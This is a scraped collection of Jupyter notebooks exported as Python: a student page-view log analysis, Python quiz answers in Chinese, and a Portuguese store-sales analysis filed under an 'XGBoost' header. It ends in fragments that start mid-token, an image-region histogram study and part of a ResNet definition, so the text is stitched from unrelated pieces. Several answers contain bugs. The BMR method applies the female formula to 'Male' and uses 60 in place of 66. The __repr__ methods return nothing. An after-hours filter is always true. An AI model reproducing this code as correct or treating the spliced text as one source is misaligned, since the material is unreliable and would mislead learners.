/.ipynb_checkpoints/day1-checkpoint.ipynb
|
eaaba4dd4d9868e7663e1eea4f79bbd3116c7948
|
[] |
no_license
|
melinashk/python-practices
|
https://github.com/melinashk/python-practices
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 5,671 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
import numpy as np
import pandas as pd
import math
from sklearn import metrics
from scipy.stats import entropy
import warnings
warnings.filterwarnings("ignore")
import matplotlib.pyplot as plt
import matplotlib.dates as mdates #to format dates on our plots
# %matplotlib inline
import seaborn as sns
# -
colnames=['date', 'time','destination','student_id', 'cohort',
'ip' ]
df = pd.read_csv('curriculum-access.txt', engine='python',
header=None,
index_col=False,
names=colnames,
sep=r'\s(?=(?:[^"]*"[^"]*")*[^"]*$)(?![^\[]*\])',
na_values='"-"',
usecols=[0, 1, 2, 3, 4, 5, 6])
df
df['datetime'] = df['date'] + ' ' + df['time']
df['datetime'] = pd.to_datetime(df.datetime)
df = df.drop(columns = ['date', 'time'])
df = df.set_index('datetime')
df.head()
curie = df[df.cohort == 55]
curie['count'] = 1
curie_n = curie['count'].resample('1D').sum()
curie_n
span = 7
ema_long = curie_n.ewm(span=span, adjust=False).mean()
midband = ema_long[-1]
ub = midband + ema_long[-24:-1].std()*6
lb = midband - ema_long[-24:-1].std()*6
ub, lb
midband
pct_b = pd.DataFrame({'pct_b': (curie_n-lb)/(ub-lb)})
curie_n= pd.DataFrame(curie_n)
curie_n = pd.concat([curie_n, pct_b], axis=1)
curie_n
curie_n[curie_n.pct_b >1]
plt.figure(figsize=(12,4))
plt.plot(curie_n.pct_b, label = 'pct_b')
plt.grid()
plt.axhline(y=1.0, color='r', linestyle='-')
plt.legend()
# ### Curie students were studying really hard on April 30th for quiz!!
#
# ****
page_view = curie.groupby('destination').count()
page_view = page_view.to_dict()
curie['views'] = curie['destination'].map(page_view['student_id'])
curie.sort_values('views', ascending = False)
top_10 = curie.groupby('destination').count().sort_values('count', ascending = False).iloc[0:11]
top_10
df.loc['2019-04-04': '2019-06-30'][pd.df.cohort.isna == True]
ada = df[pd.isna(df.cohort) == True].loc['2019-02-03': '2019-06-30']
ada.student_id.unique()
ada
ada_list = pd.Series([349, 350, 351, 352, 353, 354, 355, 357, 358, 359, 360, 361,
362, 363, 364, 365, 366, 367, 368, 369, 372])
ada = df[df['student_id'].isin(ada_list)]
ada.loc['2019-12-01': '2020-05-15']
ada.loc['2019-12-01': '2020-05-15'].groupby('destination').count().sort_values('student_id', ascending = False).rename(columns = {'student_id': 'view_count'}).iloc[2:10].view_count.plot.bar(figsize=(10,4), label = 'views')
plt.show()
ada_views = ada.loc['2019-12-01': '2020-05-15'].groupby('destination').count().sort_values('student_id', ascending = False).rename(columns = {'student_id': 'view_count'})
ada_views
bayes = df[df.cohort == 34]
bayes.student_id.unique()
bayes_list = [466, 467, 468, 469, 470, 471, 472, 473, 474, 475, 476, 477, 478,
479, 480, 481, 482, 483, 484, 485, 358]
bayes = df[df.student_id.isin(bayes_list)]
bayes.loc['2020-02-01': '2020-05-15'].groupby('destination').count().sort_values('student_id', ascending = False).rename(columns = {'student_id': 'view_count'}).iloc[0:10].view_count.plot.bar(figsize=(10,4))
bayes_views = bayes.loc['2020-02-01': '2020-05-15'].groupby('destination').count().sort_values('student_id', ascending = False).rename(columns = {'student_id': 'view_count'})
bayes_views
views = pd.concat([ada_views,bayes_views])
views.groupby('destination').sum().sort_values('view_count', ascending = False).view_count.iloc[2:12].plot.bar(figsize = (12,4), label = 'views')
plt.ylabel('views')
plt.title('Ada and Bayes page views after graduation')
plt.xticks(rotation = 80)
instructors = df[df.cohort == 28]
instructors.student_id.unique()
df[df.student_id == 37]
df = df.destination.dropna()
def get_topic(destination):
ds_list = ["python", "time series", "nlp"]
web_dev = ["javascript", "java", "css"]
for ds in ds_list:
if ds in destination:
return "Data Science"
for wd in web_dev:
if wd in destination:
return "Web Dev"
return "Unknown"
df["course"] = df.destination.apply(get_topic)
df.loc['2020-04-08 09:25:18'].destination = '2-storytelling/2.2-create'
df[df.course == 'Unknown']
ds = pd.concat([ada, bayes, curie])
ds = ds.drop(columns = 'views')
ds
ds['cohort'] = ds.cohort.fillna(100)
ds = ds.dropna()
ds.head(3)
ada_size = ds[ds.cohort == 100].student_id.nunique()
curie_size = ds[ds.cohort == 55].student_id.nunique()
bayes_size = ds[ds.cohort == 34].student_id.nunique()
ds_sampled = ds.resample('H').count()
ds_sampled['hour'] = ds_sampled.index.hour
ds_sampled.head(4)
ds_af = ds_sampled[(ds_sampled['hour']<8) | (ds_sampled['hour']>5)]
ds_af.resample('D').sum().ip.plot()
ada_sampled = ada.resample('H').count()
bayes_sampled = bayes.resample('H').count()
curie_sampled = curie.resample('H').count()
ada_sampled['hour'] = ada_sampled.index.hour
bayes_sampled['hour'] = bayes_sampled.index.hour
curie_sampled['hour'] = curie_sampled.index.hour
ada_af = ada_sampled[(ada_sampled['hour']<8) | (ada_sampled['hour']>5)]/ada_size
bayes_af = bayes_sampled[(bayes_sampled['hour']<8) | (bayes_sampled['hour']>5)]/bayes_size
curie_af = curie_sampled[(curie_sampled['hour']<8) | (curie_sampled['hour']>5)]/curie_size
# +
ada_af.resample('D').sum().ip.plot(label = 'Ada')
bayes_af.resample('D').sum().ip.plot(label = 'Bayes')
curie_af.resample('D').sum().ip.plot(label = 'Curie')
plt.ylabel('Afterhour page views per student')
plt.legend()
# -
ada_stat = ada_af.loc['2019-02-01': '2019-06-15'].resample('M').sum().iloc[:,:1]
bayes_stat = bayes_af.loc['2019-09-01': '2020-01-15'].resample('M').sum().iloc[:,:1]
curie_stat = curie_af.loc['2020-02-03': '2020-05-15'].resample('M').sum().iloc[:,:1]
ada_stat['month'] = [1,2,3,4,5]
bayes_stat['month'] = [1,2,3,4,5]
curie_stat['month'] = [1,2,3,4]
bayes_stat
sns.barplot(x = 'month', y = 'destination', data = ada_stat)
sns.barplot(x = 'month', y = 'destination', data = bayes_stat)
sns.barplot(x = 'month', y = 'destination', data = curie_stat)
data = pd.concat([ada_stat.reset_index().drop(columns = ['datetime','month']),bayes_stat.reset_index().drop(columns = 'datetime'),curie_stat.reset_index().drop(columns = ['datetime','month'])], axis =1)
data.columns = ['Ada', 'Bayes', 'month', 'Curie']
data
data.plot.bar(x = 'month', y = ['Ada', 'Bayes', 'Curie'])
plt.ylabel('Average afterhour page views per student')
plt.title('Afterhours pageviews per student by month')
df[df.cohort==34]
| 6,716 |
/Python_quiz_ans.ipynb.ipynb
|
16ceb5b1cc7ff2cdb3d09d63cb682050730fe624
|
[] |
no_license
|
ehearo/Python_Practice
|
https://github.com/ehearo/Python_Practice
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 36,973 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # 1 Input Output and Comment
# ## quiz1:
# 分別使用 input() 輸入你的名字、性別、年齡 <br>
# 並使用三種 print() 分別輸出一段包含這些資料的句子。<br>
# print("" %())<br>
# print("").format())<br>
# print(f'')<br>
#
# 選一個之後你主要要用來 print 的方式 (推薦 f-string)<br>
name, gender, age = input('Please enter your name, gender, age:').split(' ')
print("name: %s, gender: %s, age: %s" % (name, gender, age))
print("name: {}, gender: {}, age: {}".format(name, gender, age))
print(f"name: {name}, gender: {gender}, age: {age}")
# # 2 Data Type
# ## quiz1:
# 給定字串如下,使用 slicing 取出<br>
# 整數部分<br>
# 字元部分<br>
# s = '1a2b3c4d5e6f'<br>
s = '1a2b3c4d5e6f'
print(s[0::2])
print(s[1::2])
# ## quiz2:
#
# 輸入你的身高 (cm),以及體重 (kg)<br>
# 計算 BMI 後以兩位小數點的精準度印出 (BMI = 體重(kg) / (身高(m))^2)<br>
# height = input()<br>
# weight = input()<br>
# +
height, weight = input('Please enter your height(cm), weight(kg):').split(' ')
BMI = int(weight)/(int(height)/100)**2
print(f"{BMI:.2f}")
# -
# # 3 Containers
# ## quiz 1
#
# 宣告一個 list<br>
# 新增 1 筆任意數字<br>
# 新增 5 筆任意數字<br>
# 逆排序<br>
# 刪除 index 為 3的數字<br>
# 在前面新增 5 個任意數字<br>
# 排序<br>
# 轉換成 tuple<br>
# 宣告一個 list
a = []
# 新增 1 筆任意數字
a.append(-7)
print(a)
# 新增 5 筆任意數字
a += [-3, 2, 5, 7, 9]
print(a)
# 逆排序
b = a[::-1]
print(b)
# 刪除 index 為 3的數字
a.pop(3)
print(a)
# 在前面新增 5 個任意數字
a = [0, 2, 4, 6, 8] + a
print(a)
# 排序
a.sort()
print(a)
# 轉換成 tuple
c = tuple(a)
print(c)
# ## quiz 2
# 宣告兩個一樣長度的 list, 接著使用 zip 加上型別轉換,建構出一個 dictionary
key = ["name", "gender", "age"]
val = ["Jacky", "man", 26]
obj = zip(key, val)
dict(obj)
# ## quiz 3
#
# 使用生成式,宣告兩個集合 (set) ,一個集合 (s1) 內有 -3至 5 的所有整數,另一個 (s2) 有 1 至 8 的所有整數<br>
# 印出兩集合的 交集<br>
# 印出兩集合的 聯集<br>
# 印出兩集合互相的 差集<br>
S1 = {elem for elem in range(-3,5+1)}
print(S1)
S2 = {elem for elem in range(1,8+1)}
print(S2)
print(S1 & S2)
print(S1 | S2)
print(S1 - S2)
print(S2 - S1)
# # 4 Control Flow
# ## quiz1:
# 請使用 control flow 結合 for迴圈,計算此成績列的 GPA。
#
# **成績與 GP 對照表**<br>
# 90 <= score          : 4.3<br>
# 85 <= score < 90 : 4.0<br>
# 80 <= score < 85 : 3.7<br>
# 77 <= score < 80 : 3.3<br>
# 73 <= score < 77 : 3.0<br>
# 70 <= score < 73 : 2.7<br>
# 67 <= score < 70 : 2.3<br>
# 63 <= score < 67 : 2.0<br>
# 60 <= score < 63 : 1.7<br>
# 50 <= score < 60 : 1.0<br>
#            score < 50 : 0<br>
#
# **每筆資料為 (科目成績, 科目學分數)**<br>
# transcript = [(50, 1), (78, 2), (96, 2), (80, 3), (81, 2), (56, 3), (73, 3), (80, 3), (99, 2), (95, 1), <br>
#                      (87, 3), (76, 3), (77, 1), (81, 3), (89, 2), (53, 3), (59, 2), (68, 2), (54, 3), (58, 3)]
transcript = [(50, 1), (78, 2), (96, 2), (80, 3), (81, 2), (56, 3), (73, 3), (80, 3), (99, 2), (95, 1),
(87, 3), (76, 3), (77, 1), (81, 3), (89, 2), (53, 3), (59, 2), (68, 2), (54, 3), (58, 3)]
# +
total_gp = 0
total_weight = 0
for score, weight in transcript:
if 90 <= score:
total_gp += 4.3*weight
total_weight += weight
elif 85 <= score and score < 90:
total_gp += 4.0*weight
total_weight += weight
elif 80 <= score and score < 85:
total_gp += 3.7*weight
total_weight += weight
elif 77 <= score and score < 80:
total_gp += 3.3*weight
total_weight += weight
elif 73 <= score and score < 77:
total_gp += 3.0*weight
total_weight += weight
elif 70 <= score and score < 73:
total_gp += 2.7*weight
total_weight += weight
elif 67 <= score and score < 70:
total_gp += 2.3*weight
total_weight += weight
elif 63 <= score and score < 67:
total_gp += 2.0*weight
total_weight += weight
elif 60 <= score and score < 63:
total_gp += 1.7*weight
total_weight += weight
elif 50 <= score and score < 60:
total_gp += 1.0*weight
total_weight += weight
else:
total_gp += 0*weight
total_weight += weight
GPA = total_gp/total_weight
print(GPA)
# -
# ## quiz2:
# 下面是一個資料集的影像名稱,每張影像除了有六碼編號之外,還有它屬於的類別 (01 ~ 04)
#
# data = ['IMG035833_02.jpeg',<br>
#              'IMG069933_03.jpeg',<br>
#              'IMG001572_02.jpeg',<br>
#              'IMG025945_02.jpeg',<br>
#              'IMG024850_01.jpeg',<br>
#              'IMG086288_03.jpeg',<br>
#              'IMG069932_04.jpeg',<br>
#              'IMG032322_04.jpeg',<br>
#              'IMG049740_03.jpeg',<br>
#              'IMG013506_03.jpeg',<br>
#              'IMG001813_01.jpeg',<br>
#              'IMG014431_04.jpeg',<br>
#              'IMG026580_04.jpeg',<br>
#              'IMG028975_04.jpeg',<br>
#              'IMG079073_04.jpeg',<br>
#              'IMG049077_02.jpeg',<br>
#              'IMG033090_04.jpeg',<br>
#              'IMG040904_04.jpeg',<br>
#              'IMG065895_03.jpeg',<br>
#              'IMG012382_01.jpeg',<br>
#              'IMG028850_03.jpeg',<br>
#              'IMG068507_01.jpeg',<br>
#              'IMG078936_04.jpeg',<br>
#              'IMG003145_04.jpeg',<br>
#              'IMG056011_02.jpeg',<br>
#              'IMG015516_01.jpeg',<br>
#              'IMG077548_02.jpeg',<br>
#              'IMG040693_01.jpeg',<br>
#              'IMG015801_02.jpeg',<br>
#              'IMG066898_02.jpeg',<br>
#              'IMG039423_04.jpeg',<br>
#              'IMG085263_03.jpeg',<br>
#              'IMG068941_04.jpeg',<br>
#              'IMG028542_03.jpeg',<br>
#              'IMG016187_01.jpeg',<br>
#              'IMG046760_02.jpeg',<br>
#              'IMG083860_03.jpeg',<br>
#              'IMG012974_03.jpeg',<br>
#              'IMG094728_04.jpeg',<br>
#              'IMG023535_01.jpeg',<br>
#              'IMG046037_04.jpeg',<br>
#              'IMG084306_02.jpeg',<br>
#              'IMG008328_01.jpeg',<br>
#              'IMG097630_04.jpeg',<br>
#              'IMG046427_02.jpeg',<br>
#              'IMG098467_03.jpeg',<br>
#              'IMG078326_02.jpeg',<br>
#              'IMG036626_03.jpeg',<br>
#              'IMG060321_04.jpeg',<br>
#              'IMG082753_01.jpeg',<br>
#              'IMG066053_02.jpeg',<br>
#              'IMG082360_04.jpeg',<br>
#              'IMG082000_02.jpeg',<br>
#              'IMG098735_04.jpeg',<br>
#              'IMG028116_03.jpeg',<br>
#              'IMG018454_03.jpeg',<br>
#              'IMG053744_03.jpeg',<br>
#              'IMG010996_04.jpeg',<br>
#              'IMG062445_03.jpeg',<br>
#              'IMG040778_03.jpeg',<br>
#              'IMG034566_01.jpeg',<br>
#              'IMG095526_04.jpeg',<br>
#              'IMG010351_03.jpeg',<br>
#              'IMG085847_04.jpeg',<br>
#              'IMG013204_03.jpeg',<br>
#              'IMG060903_03.jpeg',<br>
#              'IMG043702_03.jpeg',<br>
#              'IMG020717_01.jpeg',<br>
#              'IMG026048_02.jpeg',<br>
#              'IMG068022_03.jpeg']<br>
#
#
# 觀察上面檔名的規律,並宣告四個 list,設計程式將上述影像檔名,把他們的編號放置到四個對應的類別 list 中。
#
# 做為參考,在執行完你的程式後,四個 list 會存入的東西分別為:<br>
# category1_id = ['024850', '001813', '012382', '068507' .... ]<br>
# category2_id = ['035833', '001572', '025945', '049077' .... ]<br>
# category3_id = ['069933', '086288', '049740', '013506' .... ]<br>
# category4_id = ['069932', '032322', '014431', '026580' .... ]<br>
data = ['IMG035833_02.jpeg',
'IMG069933_03.jpeg',
'IMG001572_02.jpeg',
'IMG025945_02.jpeg',
'IMG024850_01.jpeg',
'IMG086288_03.jpeg',
'IMG069932_04.jpeg',
'IMG032322_04.jpeg',
'IMG049740_03.jpeg',
'IMG013506_03.jpeg',
'IMG001813_01.jpeg',
'IMG014431_04.jpeg',
'IMG026580_04.jpeg',
'IMG028975_04.jpeg',
'IMG079073_04.jpeg',
'IMG049077_02.jpeg',
'IMG033090_04.jpeg',
'IMG040904_04.jpeg',
'IMG065895_03.jpeg',
'IMG012382_01.jpeg',
'IMG028850_03.jpeg',
'IMG068507_01.jpeg',
'IMG078936_04.jpeg',
'IMG003145_04.jpeg',
'IMG056011_02.jpeg',
'IMG015516_01.jpeg',
'IMG077548_02.jpeg',
'IMG040693_01.jpeg',
'IMG015801_02.jpeg',
'IMG066898_02.jpeg',
'IMG039423_04.jpeg',
'IMG085263_03.jpeg',
'IMG068941_04.jpeg',
'IMG028542_03.jpeg',
'IMG016187_01.jpeg',
'IMG046760_02.jpeg',
'IMG083860_03.jpeg',
'IMG012974_03.jpeg',
'IMG094728_04.jpeg',
'IMG023535_01.jpeg',
'IMG046037_04.jpeg',
'IMG084306_02.jpeg',
'IMG008328_01.jpeg',
'IMG097630_04.jpeg',
'IMG046427_02.jpeg',
'IMG098467_03.jpeg',
'IMG078326_02.jpeg',
'IMG036626_03.jpeg',
'IMG060321_04.jpeg',
'IMG082753_01.jpeg',
'IMG066053_02.jpeg',
'IMG082360_04.jpeg',
'IMG082000_02.jpeg',
'IMG098735_04.jpeg',
'IMG028116_03.jpeg',
'IMG018454_03.jpeg',
'IMG053744_03.jpeg',
'IMG010996_04.jpeg',
'IMG062445_03.jpeg',
'IMG040778_03.jpeg',
'IMG034566_01.jpeg',
'IMG095526_04.jpeg',
'IMG010351_03.jpeg',
'IMG085847_04.jpeg',
'IMG013204_03.jpeg',
'IMG060903_03.jpeg',
'IMG043702_03.jpeg',
'IMG020717_01.jpeg',
'IMG026048_02.jpeg',
'IMG068022_03.jpeg']
category1_id = []
category2_id = []
category3_id = []
category4_id = []
for file in data:
name, category = file[3:9], file[10:12]
if category == '01':
category1_id.append(name)
elif category == '02':
category2_id.append(name)
elif category == '03':
category3_id.append(name)
else:
category4_id.append(name)
print(category1_id)
print(category2_id)
print(category3_id)
print(category4_id)
D = {}
for file in data:
name, category = file[3:9], file[10:12]
if category not in D:
D[category] = []
D[category].append(name)
print(D)
# # quiz3:
#
# 請使用 list comprehension 建構出一個二維的 list,內容如下
#
# [[10, 11, 12, 13, 14, 16, 17, 18, 19],<br>
#  [20, 21, 22, 23, 24, 26, 27, 28, 29],<br>
#  [30, 31, 32, 33, 34, 36, 37, 38, 39],<br>
#  [40, 41, 42, 43, 44, 46, 47, 48, 49],<br>
#  [60, 61, 62, 63, 64, 66, 67, 68, 69],<br>
#  [70, 71, 72, 73, 74, 76, 77, 78, 79],<br>
#  [80, 81, 82, 83, 84, 86, 87, 88, 89],<br>
#  [90, 91, 92, 93, 94, 96, 97, 98, 99]]<br>
[[row*10+col for col in range(10)] for row in range(1, 10)]
# # 5 Functions
# ## quiz1:
# 實作一個 lambda function,把輸入 (數字) 平方之後加上 5 回傳。
f = lambda x: (x**2)+5
f(10)
# ## quiz2:
# 實作一個 function,輸入寬 (w) 及長 (l) 後印出如附圖所示的鉛筆形狀。
# +
# |******
# |*******
# w********
# |*******
# |******
# --l--
# e.g.
# pencil(5, 6) 會印出
# *******
# ********
# *********
# ********
# *******
# -
def pencil(w, l):
for row in range(w):
print("*"*(l+min(row, w-row-1)))
pencil(5,6)
# ## quiz3:
# 建構一個 費式數列 的 generator
#
# 使用 next() 的時候<br>
# 第一次 yield 1<br>
# 第二次 yield 1<br>
# 第三次 yield 2<br>
# 第四次 yield 3<br>
# 第五次 yield 5<br>
# ... 以此類推<br>
# f(0) = 0
# f(1) = 1
# f(n) = f(n-1)+f(n-2)
def fib_generator():
# your code here
yield 0
yield 1
f_m2, f_m1 = 0, 1
while True:
f_m1, f_m2 = f_m2+f_m1, f_m1
yield f_m1
# +
# 可以使用此段程式驗證你的 generator 有沒有成功
f = fib_generator()
for i in range(10):
print(next(f))
# -
# # 6 Object Oriented Programming (OOP)
# ## quiz1:
# 運用 person 內的一些屬性(性別年齡身高體重)實作 BMR 的計算。
#
# BMR(男)=(13.7×體重(公斤))+(5.0×身高(公分))-(6.8×年齡)+66<br>
# BMR(女)=(9.6×體重(公斤))+(1.8×身高(公分))-(4.7×年齡)+655<br>
class person:
def __init__(self, name, age, height, weight, gender):
self.name = name
self.age = age
self.gender = gender # 'Male' or 'Female'
self.height = height
self.weight = weight
def __repr__(self):
return f'Class Person: {self.name}'
def BMR(self):
if self.gender == 'Man':
return (13.7*self.weight+5.0*self.height-6.8*self.age)+60
elif self.gender == 'Male':
return (9.6*self.weight+1.8*self.height-4.7*self.age)+655
else:
return None
p1 = person('Jacky', 26, 178, 64, 'Man')
print(p1.BMR())
p2 = person('Jacky', 26, 178, 64, 'Male')
print(p2.BMR())
# ## quiz2:
# 給定一個正多邊形的父類別,使用繼承分別定出正三角形,正四邊形的子類別。
#
# 並在正三角形類別實作面積與高的 method。<br>
# 在正四邊形類別實作面積與對角線長的 method。<br>
# +
class polygon: #正多邊形
def __init__(self, length):
self.length = length
def __repr__(self):
return f'Polygon of length {self.length}'
class triangle(polygon):
def __init__(self, length):
super().__init__(length)
self.edge = self.length/3
def __repr__(self):
f'Triangle of height {self.height()}' + f"\nArea : {self.area()}"
def area(self):
return (3**(1/2))/4*self.edge**2
def height(self):
return (3**(1/2))/2*self.edge
class square(polygon):
def __init__(self, length):
super().__init__(length)
self.edge = self.length/4
def __repr__(self):
f'Square of diagonal {self.diagonal()}' + f"\nArea : {self.area()}"
def area(self):
return self.edge**2
def diagonal(self):
return (2**(1/2))*self.edge
# +
# 可以使用此程式驗證你的 class 有沒有撰寫正確
tri5 = triangle(10)
print(tri5.area())
print(tri5.height())
sqr7 = square(7)
print(sqr7.area())
print(sqr7.diagonal())
# -
# ## <b>補充1
# > <b>class attribute<br>
# > <b>instance attribute
class Animal:
cat = 0 # class attribute
def __init__(self):
self.dog = 5 # instance attribute
self.cow = "Python" # instance attribute
Animal.__dict__ # vars(Animal)
Animal.cat
my_cls = Animal()
my_cls.__dict__
my_cls.dog
my_cls.cow
# 還是可以呼叫到class attribute
my_cls.cat
# ## <b>補充2
# > <b>private<br>
class Animal:
cat = 0
def __init__(self):
self.__dog = 5 # 前面加兩個底線即為 private
self.cow = "Python"
my_cls = Animal()
my_cls.dog
my_cls.__dog
vars(my_cls)
my_cls._Animal__dog
# ## <b>補充3
# > <b>__init__<br>
class company:
employee = []
name = ""
age = 0
def __init__(self, name, age): # employee 沒有初始化
self.employee += [name]
self.name += name
self.age += age
print(company.employee)
print(company.name)
print(company.age)
A = company(name = "John", age = 18)
print(company.employee) # 因為 employee 沒有初始化
print(company.name)
print(company.age)
B = company(name = "JoJo", age = 15)
C = company(name = "DIO", age = 180)
print(company.employee) # 因為 employee 沒有初始化
print(company.name)
print(company.age)
| 17,206 |
/4. XGBoost.ipynb
|
5c95fbcf4abcefd82edd0d1b6990a84df5e0ad10
|
[] |
no_license
|
garyjxgong/Mortgage-Default-Detection
|
https://github.com/garyjxgong/Mortgage-Default-Detection
| 1 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 127,007 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# ### Disciplina: Projeto Data Warehouse
#
# ### PROFª: Juliana Forin Pasquini Martinez
#
# #### ALUNOS: Henrique Zucareli Santiago, Marcelo Pereira Fernandes
#
# #### OBJETIVO: Analisar vendas de uma rede de lojas
#
# Baixar dados de: https://drive.google.com/file/d/1snkXBakN3Yo_imKamUCtdz2ZYpIXF3KD/view?usp=sharing
# ### Importando panda
#importando panda
import pandas as pd
# ### Importanto Base de dados do arquivo csv
#importandobase de dados arquivo csv
data = pd.read_csv('Vendas.csv', encoding = 'Latin 1', sep = ';')
# ### Especificando o Cabeçalho do Arquivo
#Especificando o cabeçalho do arquivo
data = pd.read_csv('Vendas.csv', encoding = 'Latin 1', sep = ';', header = 0)
# ### Selecionando Colunas
data = pd.read_csv('Vendas.csv', encoding = 'Latin 1', sep = ';', usecols = ['COD_VENDA','DATA', 'ID_LOJA', 'PRODUTO', 'QUANTIDADE','VR_UNIT', 'VR_FINAL'])
# ### Visualização da tabela de Dados
data.head()
# ### Importando biblioteca seaborn
import seaborn as sb
low_memory=False
# %matplotlib inline
pd.options.display.max_columns = 80
pd.options.display.max_rows = 90
# ### Soma de vendas de todas as lojas
venda_total = round(data.VR_FINAL.sum(),2)
display(venda_total)
# ### Soma de vendas de cada loja
venda_loja = data[['ID_LOJA', 'VR_FINAL']].groupby('ID_LOJA').sum()
venda_loja = venda_loja.sort_values(by='ID_LOJA', ascending=False)
display(venda_loja)
# ### Soma da quantidade de vendas de cada loja
quantidade_loja = data[['ID_LOJA', 'QUANTIDADE']].groupby('ID_LOJA').sum()
quantidade_loja = quantidade_loja.sort_values(by='ID_LOJA', ascending=False)
display(quantidade_loja)
# ### Média de valor de cada venda em cada loja
venda_media = (venda_loja['VR_FINAL'] / quantidade_loja['QUANTIDADE']).to_frame()
venda_media = venda_media.rename(columns={0: 'VENDA_MEDIA'})
venda_media = venda_media.sort_values(by='VENDA_MEDIA', ascending=False)
display(venda_media)
# ### Gráfico de barra com o comparativo de vendas de cada loja
venda_loja.groupby('ID_LOJA')['VR_FINAL'].sum().sort_values().tail(13).plot(title='VENDA POR LOJA', kind='bar', figsize=(10,5))
# ### Gráfico de pizza com o comparativo de vendas de cada loja
venda_loja.groupby('ID_LOJA')['VR_FINAL'].sum().sort_values().tail(13).plot(title='VENDA POR LOJA', kind='pie', figsize=(10,5))
# ### Dados da quantidade de cada produto vendido
produto_vendido = data[['PRODUTO', 'QUANTIDADE']].groupby('PRODUTO').sum()
produto_vendido = produto_vendido.sort_values(by='QUANTIDADE', ascending=False)
display(produto_vendido)
# ### Soma do valor de vendas de cada produto
produto_faturamento = data[['PRODUTO', 'VR_FINAL']].groupby('PRODUTO').sum()
produto_faturamento = produto_faturamento.sort_values(by='VR_FINAL', ascending=False)
display(produto_faturamento)
n('Região Branca', pixel_intensity=255, threshold=255, original=original, segmented=segmented)
axarr[1, 1].set_title(t)
axarr[1, 1].imshow(img, cmap='gray')
# -
# Agora que temos as regiões fragmentadas, vamos explorar um pouco mais a intesidade dos pixels de cada região, avaliando o histograma de cada região e se pertence a alguma distribuição conhecida.
# A função "group_region_pixels" irá agrupar os pixels da imagem original, retornando as intensidades dos pixels. Agora não iremos mais trabalhar diretamente com o posicionamento dos pixels, apenas com as intensidades de pixels que pertencem a cada região.
#
# Portanto essa função retorna um dicionário, onde os índices do dicionário serão:
# 0, 50, 200, 255, sendo região escura, preto-claro, cinza e branca, respectivamente.
groups = group_region_pixels(original, segmented)
print('As chaves do dicionário "groups" são:')
groups.keys()
# # 2 - Análise das Regiões
#
# Na análise das regiões, vamos compreender quais são a intensidade dos pixels de cada região e ao analisarmos o histograma visualmente, verificar se o mesmo pode-se adequar a uma distribuição já conhecida.
#
# ## 2.1 - Região Escura
#
# Para acessarmos a região escura, precisamos acessar groups[0].
"""
Descreve os pixels da região, dizendo a quantidade total, maior e menor intensidade.
Retorna a versão em numpy array da lista.
"""
def desc(region_name, list_group):
np_region = np.asarray(list_group)
qtd = len(list_group)
min_val = np_region.min()
max_val = np_region.max()
print(f'Há {qtd} pixels na região {region_name}.')
print(f'A menor intensidade de pixel é {min_val} e a máxima é {max_val}.')
return np_region
np_dark_region = desc('escura', groups[0])
sns.distplot(np_dark_region, bins = range(0,256), norm_hist=True)
# ### Conclusão
#
#
# Vemos que a região **escura** possui a grande maioria dos pixels com intensidade 0 (totalmente preto) e alguns pixels outliers diferente de 0.
#
# Dessa forma, torna-se difícil dizer que a **região escura** segue alguma distribuição.
# ## 2.2 - Região Preto-claro
#
# Para acessarmos a região preto-claros, acessamos groups[50].
np_light_dark_region = desc('escura', groups[50])
sns.distplot(np_light_dark_region, bins = range(0,256), norm_hist=True)
# Nesta região, o comportamento já é um pouco diferente. Se parece com a distribuição **exponencial**.
import scipy.stats as st
sns.distplot(np_light_dark_region, bins = range(0,256), fit=st.expon, norm_hist=True)
# #### Conclusão:
#
# Podemos realizar o teste do qui-quadrado para avaliar a adequação da região preto-claro em relação à distribuição exponencial.
# ## 2.3 - Região Cinza
#
# Para acessarmos a região cinza, usamos groups[200].
np_grey_region = desc('cinza', groups[200])
sns.distplot(np_grey_region, bins = range(0,256), norm_hist=True)
# #### Conclusão:
#
# Não é possível inferir nada referente à região cinza.
# ## 2.4 - Região Branca
#
# Para acessarmos a região branca, usamos groups[255].
np_white_region = desc('branca', groups[255])
sns.distplot(np_white_region, bins = range(0,256), norm_hist=True)
# Será que se parece com a normal?
sns.distplot(np_white_region, bins = range(0,256), norm_hist=True, fit=st.norm)
# #### Conclusão:
#
# Não é possível inferir nada sobre a região branca.
# # 3 - Conclusão Preliminar
#
# Não foi possível avaliar a primeiro momento a adequação de nenhuma das regiões às distribuições conhecidas, como gaussiano, exponencial, gamma ou rayleigh, com ressalvo à região cinza, que pode estar relacionada à dsitribuição exponencial.
= None
if stride != 1 or self.inplanes != planes * block.expansion:
downsample = nn.Sequential(
nn.Conv2d(self.inplanes, planes * block.expansion,
kernel_size=1, stride=stride, bias=False),
nn.BatchNorm2d(planes * block.expansion),
)
layers = []
layers.append(block(self.inplanes, planes, stride, downsample))
self.inplanes = planes * block.expansion
for i in range(1, blocks):
layers.append(block(self.inplanes, planes))
return nn.Sequential(*layers)
def forward(self, x):
x = self.conv1_custom(x)
x = self.bn1(x)
x = self.relu(x)
x = self.maxpool(x)
x = self.layer1(x)
x = self.layer2(x)
x = self.layer3(x)
x = self.layer4(x)
x = self.avgpool(x)
x = x.view(x.size(0), -1)
out = self.fc_custom(x)
return out
def resnet18(pretrained=False, channel= 20, **kwargs):
"""Constructs a ResNet-18 model.
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
"""
model = ResNet(BasicBlock, [2, 2, 2, 2], nb_classes=101, channel=channel, **kwargs)
if pretrained:
pretrain_dict = model_zoo.load_url(model_urls['resnet18']) # modify pretrain code
model_dict = model.state_dict()
model_dict=weight_transform(model_dict, pretrain_dict, channel)
model.load_state_dict(model_dict)
return model
def resnet34(pretrained=False, channel= 20, **kwargs):
model = ResNet(BasicBlock, [3, 4, 6, 3], nb_classes=101, channel=channel, **kwargs)
if pretrained:
pretrain_dict = model_zoo.load_url(model_urls['resnet34']) # modify pretrain code
model_dict = model.state_dict()
